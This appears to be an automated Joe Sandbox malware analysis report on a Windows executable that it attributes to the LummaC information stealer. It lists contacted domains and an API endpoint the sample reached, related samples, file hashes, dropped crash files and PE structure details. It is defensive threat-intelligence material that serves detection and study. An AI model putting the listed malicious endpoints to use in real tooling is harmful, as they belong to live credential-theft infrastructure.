Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
hummskitnj.buzz | false | | high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://x1.c.lencr.org/0MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://x1.i.lencr.org/0MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/workshop/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://login.steampowered.com/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allMPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://store.steampowered.com/legal/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://avatars.faMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoMPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://recaptcha.netMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://store.steampowered.com/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=eMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://127.0.0.1:27060MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
-- | ------ | ------- | --- | -------- | ---------
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581627
Start date and time: 2024-12-28 10:04:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MPgkx6bQIQ.exe (renamed because the original name is a hash value)
Original Sample Name: 1663e17268ae9d60dd70ae27b8ea43ab.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@10/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 24
• Number of non-executed functions: 227
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212, 4.245.163.56, 20.190.177.20
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:05:14 | API Interceptor | 11x Sleep call for process: MPgkx6bQIQ.exe modified
04:05:40 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.157.254 | l0zocrLiVW.exe | malicious | LummaC |
172.67.157.254 | XYQ1pqHNiT.exe | malicious | LummaC |
172.67.157.254 | 5Z19n7XRT1.exe | malicious | LummaC |
172.67.157.254 | TdloJt4gY3.exe | malicious | LummaC |
172.67.157.254 | 726odELDs8.exe | malicious | LummaC |
172.67.157.254 | Tqa1vDp9NT.exe | malicious | LummaC |
172.67.157.254 | YrWaRb0IKJ.exe | malicious | LummaC |
172.67.157.254 | FfcoO2Giru.exe | malicious | LummaC |
172.67.157.254 | k7T6akLcAr.exe | malicious | LummaC |
172.67.157.254 | hx0wBsOjkQ.exe | malicious | LummaC |
23.55.153.106 | l0zocrLiVW.exe | malicious | LummaC |
23.55.153.106 | SQHE4Hsjo6.exe | malicious | LummaC |
23.55.153.106 | XYQ1pqHNiT.exe | malicious | LummaC |
23.55.153.106 | GHXsFkoroU.exe | malicious | LummaC |
23.55.153.106 | 5Z19n7XRT1.exe | malicious | LummaC |
23.55.153.106 | TdloJt4gY3.exe | malicious | LummaC |
23.55.153.106 | 3LUyRfIoKs.exe | malicious | LummaC |
23.55.153.106 | 726odELDs8.exe | malicious | LummaC |
23.55.153.106 | Tqa1vDp9NT.exe | malicious | LummaC |
23.55.153.106 | YrWaRb0IKJ.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | l0zocrLiVW.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | XYQ1pqHNiT.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | GHXsFkoroU.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 5Z19n7XRT1.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | TdloJt4gY3.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | 3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 726odELDs8.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | Tqa1vDp9NT.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | YrWaRb0IKJ.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | v5Evrl41VR.exe | malicious | LummaC | 104.21.66.86
steamcommunity.com | SQHE4Hsjo6.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | XYQ1pqHNiT.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | GHXsFkoroU.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 5Z19n7XRT1.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | TdloJt4gY3.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 3LUyRfIoKs.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 726odELDs8.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Tqa1vDp9NT.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | YrWaRb0IKJ.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 2S6U7zz1Jg.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | l0zocrLiVW.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | SQHE4Hsjo6.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | XYQ1pqHNiT.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | GHXsFkoroU.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 5Z19n7XRT1.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | TdloJt4gY3.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 3LUyRfIoKs.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 726odELDs8.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | Tqa1vDp9NT.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | YrWaRb0IKJ.exe | malicious | LummaC | 23.55.153.106
CLOUDFLARENETUS | l0zocrLiVW.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | XYQ1pqHNiT.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | GHXsFkoroU.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | TNyOrM6mIM.exe | malicious | LummaC | 104.21.2.51
CLOUDFLARENETUS | 5Z19n7XRT1.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | TdloJt4gY3.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | 3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | 726odELDs8.exe | malicious | LummaC |
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0657929474574444
Encrypted: false
SSDEEP: 192:WvZiEFmzk0ABptju3mFXzuiF1Z24IO87:WBFmrABptjLXzuiF1Y4IO87
MD5: 1FA9B33F1EB72B54C361D08E1F99FB29
SHA1: 9842F8247CB175F09D84441107024C1F6DFB5E68
SHA-256: E484024903EDC6180FD1940F1AA4F38C12E803970D9E4D2B08FBAC64CA23CDEF
SHA-512: 523B08914E381623FAD32B817B692B20438801C09F42042A437FCFFC989EE0BAA2FCE73780E7B1DDB27AFE6B7498F07449EAA511DF0C3838507DFB1FE866DCFA
Malicious: true
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Dec 28 09:05:30 2024, 0x1205a4 type
Category: dropped
Size (bytes): 108078
Entropy (8bit): 2.1686264816718217
Encrypted: false
SSDEEP: 768:FeAAkFp1QTB2Ws4k7oxWId735+ZFd8LIRtxJN:YAAkv1XWs4nxW2N+ZFd8L+txJN
MD5: 3AC5D6718DE691F30A69F21A22B23830
SHA1: 36D3CA05A07D2058F264DE5F57AB431DE18E542B
SHA-256: E63D72B6AB77580DA32682F8C6FAC2C71BAFC6339DC1B4EF4A1C3A9112656344
SHA-512: 22659699F09E0672EB84B04C446B92E8577FBF93D700FBC2A995DFDB531244FE24DEFC05AD90863D5F146613CCA49C38B9B73BAA2939D43559EAF251AAA6DDC1
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8430
Entropy (8bit): 3.6981819956987767
Encrypted: false
SSDEEP: 192:R6l7wVeJMF6Iqa+e6YS5SUA3gmfW9spDO89bxnsfObm:R6lXJ26Iqq6YMSUA3gmfymxsfT
MD5: 5AA6EE745D923D0DA8BB32132FF7060E
SHA1: 2708E48A64A10BDFFE0F47AEAB39B9398BB460AE
SHA-256: 22C5C9E4961922190D70E653854257955B938D7898E1FDD1A4E8DE558E8B13BC
SHA-512: 1A944D226FFF314F7CF427F77D2FBF828B7D3FF3A2DAB9BDBED9B413C9280772DF0439BC60A7EFF2D9B5CDA8C0C58C50A1A05CE092B14310B351C2B05D02A808
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4724
Entropy (8bit): 4.490020990740064
Encrypted: false
SSDEEP: 48:cvIwWl8zsLJg77aI9b4WpW8VYEYm8M4J/Bx9HO3FA+q8vEx9HOLTvWKsttz3thQd:uIjflI7Rx7VAJ/BnFKEn2vWKEtz3thQd
MD5: 7683F954233BDDFB469EC53B45A5AB4C
SHA1: 3CEF71A4CB64A350E95335C4978D1271BD5DF67B
SHA-256: 67F5D233516290F70E8F534ACEAA43EC643A53C1BA9561C1BA6031E3EB15A710
SHA-512: 14D9332B2249774B8121102CDB603DF00933AACFAF7C3FAD8F7B406C0C033EA292CF4585A64AEF0FA5509F6852D080DFFFF5390B04572324D76BAEC415B34B30
Malicious: false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650888" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.372103478837162
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:yFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNHiL:aV1QyWWI/glMM6kF7Jq
                                                                                                                                                                                                                                                                                        MD5:DA453124C3E84ECF76FB991F75A8818E
                                                                                                                                                                                                                                                                                        SHA1:06B0FDF58B03C64C88EDD346ED737A75B0394188
                                                                                                                                                                                                                                                                                        SHA-256:C067AF89BCCE43E7474E36FDA392AE02D5E94A6ADA6009AD53025806E28F51D2
                                                                                                                                                                                                                                                                                        SHA-512:BC25401D07AA46CC8CA9123909790649C15C9D947C38A1F29B9CA1855EF0A086220DF6332C1BD514CF7C35EEDF6A7491F85B9AE43BD6468C98C41A395E2EAC14
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZX..Y...............................................................................................................................................................................................................................................................................................................................................[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.414774815934241
                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                        File name:MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                                        MD5:1663e17268ae9d60dd70ae27b8ea43ab
                                                                                                                                                                                                                                                                                        SHA1:95a8475a8682188c8a99d66b35a0157cb8788219
                                                                                                                                                                                                                                                                                        SHA256:fbc834cf913a08c6e1cba50ca8dc2b072a4e252f12448a7f5e95d3a0b1de6b7a
                                                                                                                                                                                                                                                                                        SHA512:fe40d233549ca6087b709f800a0071f8408adb32537e296764b058d347d9e90db21d63b78e64e2012c503ffa147bde55061c8658f57711e22251d82dc97f90ec
                                                                                                                                                                                                                                                                                        SSDEEP:6144:gl+Twm5nNUAm83eJqbyIkPoVJb9GOgQRBq3:gAUGNUAy+Lz9G5QRBA
                                                                                                                                                                                                                                                                                        TLSH:8C84AE6179F19025FFF74B3116709AA019FFBCA3AA74818F2290369E1E733918A65713
                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L....p.f...
                                                                                                                                                                                                                                                                                        Icon Hash:8f97312d3125191a
                                                                                                                                                                                                                                                                                        Entrypoint:0x401453
                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                        Time Stamp:0x660A7013 [Mon Apr 1 08:28:03 2024 UTC]
                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                        Import Hash:9662782e6e9e28f2f28849063179bc57
                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                        call 00007FAECCB25019h
                                                                                                                                                                                                                                                                                        jmp 00007FAECCB228FDh
                                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B398h], eax
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B394h], ecx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B390h], edx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B38Ch], ebx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B388h], esi
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B384h], edi
                                                                                                                                                                                                                                                                                        mov word ptr [0044B3B0h], ss
                                                                                                                                                                                                                                                                                        mov word ptr [0044B3A4h], cs
                                                                                                                                                                                                                                                                                        mov word ptr [0044B380h], ds
                                                                                                                                                                                                                                                                                        mov word ptr [0044B37Ch], es
                                                                                                                                                                                                                                                                                        mov word ptr [0044B378h], fs
                                                                                                                                                                                                                                                                                        mov word ptr [0044B374h], gs
                                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                                        pop dword ptr [0044B3A8h]
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B39Ch], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B3A0h], eax
                                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B3ACh], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B2E8h], 00010001h
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [0044B3A0h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B29Ch], eax
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B290h], C0000409h
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B294h], 00000001h
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444004h]
                                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444008h]
                                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                                        call dword ptr [000000BCh]
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4285c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x423000 | 0xe788 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x41000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3f27c | 0x3f400 | 773e5c30d0157ec67237a50dfc85169b | False | 0.8036839179841897 | data | 7.370191608980691 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x41000 | 0x21a2 | 0x2200 | b992d8cda7cc3912e9083c2d36e29780 | False | 0.3636259191176471 | data | 5.5497409982727115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0x3decd8 | 0xb800 | d228d385cc330146f21b5d24eed31a3f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x423000 | 0xe788 | 0xe800 | 6eb676daaf8ad44e897baed4e336f2e5 | False | 0.40476831896551724 | data | 4.4988829579035885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
